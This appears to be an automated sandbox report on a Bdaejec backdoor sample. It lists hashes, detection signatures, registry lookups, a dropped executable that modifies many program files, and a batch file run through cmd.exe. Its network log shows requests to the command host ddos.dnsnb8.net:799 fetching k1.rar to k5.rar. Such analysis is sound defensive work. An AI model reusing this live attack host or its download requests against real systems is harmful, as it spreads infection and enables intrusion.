Analysis
max time kernel: 101s
max time network: 101s
platform: windows10-2004_x64
resource: win10v2004-20250129-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250129-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05/02/2025, 13:17 UTC
Static task: static1
Behavioral task: behavioral1
Sample: eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe
Resource: win7-20241010-en
General
Target: eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe
Size: 45KB
MD5: f77eade8e037a9aa137b7c35b4640da0
SHA1: 1bb8cf50d814682890d5d0f6cb286512f12cda45
SHA256: eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2
SHA512: 4934732c6f9f248f620ccdbf32cebc00bd5f59fbb4d3349c4cd221153a0160bdd75f3b359c5b04e559812be7a15701106cf72e816210b66cdff8085dfa30b236
SSDEEP: 768:X7Z2VKKlnDRMyL+TDx8VlF67RvsypS6HkPA0d/1oQGPL4vzZq2o9W7GsxBbPr:V27bMyL6tMlA7R0ypSU0Z1jGCq2iW7z
Malware Config
Extracted
bdaejec
ddos.dnsnb8.net
Signatures
Bdaejec family
Detects Bdaejec Backdoor. 1 IoCs
Bdaejec is a backdoor written in C++.
resource yara_rule
behavioral2/memory/4756-49-0x00000000002A0000-0x00000000002A9000-memory.dmp family_bdaejec_backdoor
behavioral2/files/0x000c000000023afb-3.dat aspack_v212_v242
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation iNbVmR.exe
Executes dropped EXE 1 IoCs
pid Process
4756 iNbVmR.exe
Drops file in Program Files directory 64 IoCs
description ioc Process
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe iNbVmR.exe
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe iNbVmR.exe
File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe iNbVmR.exe
File opened for modification C:\Program Files\Windows Mail\wab.exe iNbVmR.exe
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javah.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\javaw.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\jjs.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\javaws.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\rmid.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE iNbVmR.exe
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe iNbVmR.exe
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\servertool.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\SmartTagInstall.exe iNbVmR.exe
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBridge\SkypeBridge.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE iNbVmR.exe
File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe iNbVmR.exe
File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.123\chrome_installer.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\Office16\msotd.exe iNbVmR.exe
File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe iNbVmR.exe
File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe iNbVmR.exe
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe iNbVmR.exe
File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe iNbVmR.exe
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\servertool.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe iNbVmR.exe
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteim.exe iNbVmR.exe
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe iNbVmR.exe
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe iNbVmR.exe
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe iNbVmR.exe
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe iNbVmR.exe
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\codecpacks.heif.exe iNbVmR.exe
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe iNbVmR.exe
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Microsoft.WebMediaExtensions.exe iNbVmR.exe
File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe iNbVmR.exe
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe iNbVmR.exe
File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe iNbVmR.exe
File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdb.exe iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE iNbVmR.exe
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe iNbVmR.exe
File opened for modification C:\Program Files\7-Zip\7z.exe iNbVmR.exe
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe iNbVmR.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iNbVmR.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target
PID 3788 wrote to memory of 4756 3788 eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe 84
PID 3788 wrote to memory of 4756 3788 eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe 84
PID 3788 wrote to memory of 4756 3788 eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe 84
PID 4756 wrote to memory of 2120 4756 iNbVmR.exe 88
PID 4756 wrote to memory of 2120 4756 iNbVmR.exe 88
PID 4756 wrote to memory of 2120 4756 iNbVmR.exe 88
Processes
C:\Users\Admin\AppData\Local\Temp\eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe
"C:\Users\Admin\AppData\Local\Temp\eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788
  C:\Users\Admin\AppData\Local\Temp\iNbVmR.exe
  C:\Users\Admin\AppData\Local\Temp\iNbVmR.exe
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4756
    C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6f4e4482.bat" "
    - System Location Discovery: System Language Discovery
    PID:2120
Network
-
Remote address: 8.8.8.8:53
Request: ddos.dnsnb8.net IN A
Response: ddos.dnsnb8.net IN A 44.221.84.105
-
Remote address: 44.221.84.105:799
Request: GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 44.221.84.105:799
Request: GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 44.221.84.105:799
Request: GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 44.221.84.105:799
Request: GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 8.8.8.8:53
Request: 8.8.8.8.in-addr.arpa IN PTR
Response: 8.8.8.8.in-addr.arpa IN PTR dns.google
-
Remote address: 8.8.8.8:53
Request: 105.84.221.44.in-addr.arpa IN PTR
Response: 105.84.221.44.in-addr.arpa IN PTR ec2-44-221-84-105.compute-1.amazonaws.com
-
Remote address: 8.8.8.8:53
Request: 131.160.190.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 44.221.84.105:799
Request: GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 8.8.8.8:53
Request: g.bing.com IN A
Response:
g.bing.com IN CNAME g-bing-com.ax-0001.ax-msedge.net
g-bing-com.ax-0001.ax-msedge.net IN CNAME ax-0001.ax-msedge.net
ax-0001.ax-msedge.net IN A 150.171.27.10
ax-0001.ax-msedge.net IN A 150.171.28.10
-
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
Remote address: 150.171.27.10:443
Request: GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
Response: HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9; domain=.bing.com; expires=Mon, 02-Mar-2026 13:17:29 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1DD38138A9B44A26839D255E959F46E8 Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
date: Wed, 05 Feb 2025 13:17:28 GMT
-
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
Remote address: 150.171.27.10:443
Request: GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9
Response: HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=bkkDM99nhmsOA968bAeDDSW8IgC2iD9E7wZHm27KXww; domain=.bing.com; expires=Mon, 02-Mar-2026 13:17:29 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 072B54C4B83E4075A8F4D244861102A7 Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
date: Wed, 05 Feb 2025 13:17:28 GMT
-
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
Remote address: 150.171.27.10:443
Request: GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9; MSPTC=bkkDM99nhmsOA968bAeDDSW8IgC2iD9E7wZHm27KXww
Response: HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5A22266786D54735944ADFC986977D0E Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
date: Wed, 05 Feb 2025 13:17:28 GMT
-
Remote address: 44.221.84.105:799
Request: GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 44.221.84.105:799
Request: GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 8.8.8.8:53
Request: 10.27.171.150.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 172.214.232.199.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 44.221.84.105:799
Request: GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 44.221.84.105:799
Request: GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address: 8.8.8.8:53
Request: 56.163.245.4.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 171.39.242.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 55.36.223.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 19.229.111.52.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: tse1.mm.bing.net IN A
Response:
tse1.mm.bing.net IN CNAME mm-mm.bing.net.trafficmanager.net
mm-mm.bing.net.trafficmanager.net IN CNAME ax-0001.ax-msedge.net
ax-0001.ax-msedge.net IN A 150.171.27.10
ax-0001.ax-msedge.net IN A 150.171.28.10
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.27.10:443
Request: GET /th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response: HTTP/2.0 200
content-length: 348777
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FFB1CA2708984238BA9C4897CADB1564 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
date: Wed, 05 Feb 2025 13:19:07 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.27.10:443
Request: GET /th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response: HTTP/2.0 200
content-length: 533476
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E2A699F136DE48828BFAA017EEA262BC Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
date: Wed, 05 Feb 2025 13:19:07 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.27.10:443
Request: GET /th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response: HTTP/2.0 200
content-length: 532928
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FB99CA9E894E4539ABB7483856AFC659 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
date: Wed, 05 Feb 2025 13:19:07 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.27.10:443
Request: GET /th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response: HTTP/2.0 200
content-length: 289384
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: ABA8FC40AF0448AFB27B9F2E03B95403 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
date: Wed, 05 Feb 2025 13:19:07 GMT
-
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k1.rar
-
472 B 216 B 4 5
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k2.rar
-
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k2.rar
-
518 B 256 B 5 6
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k3.rar
-
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k3.rar
-
150.171.27.10:443 https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= tls, http2 2.0kB 9.4kB 22 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
HTTP Response
204
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
HTTP Response
204
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
HTTP Response
204
-
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k4.rar
-
472 B 216 B 4 5
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k5.rar
-
472 B 216 B 4 5
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k5.rar
-
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k5.rar
-
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
150.171.27.10:443 https://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 tls, http2 61.4kB 1.8MB 1288 1285
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
HTTP Request
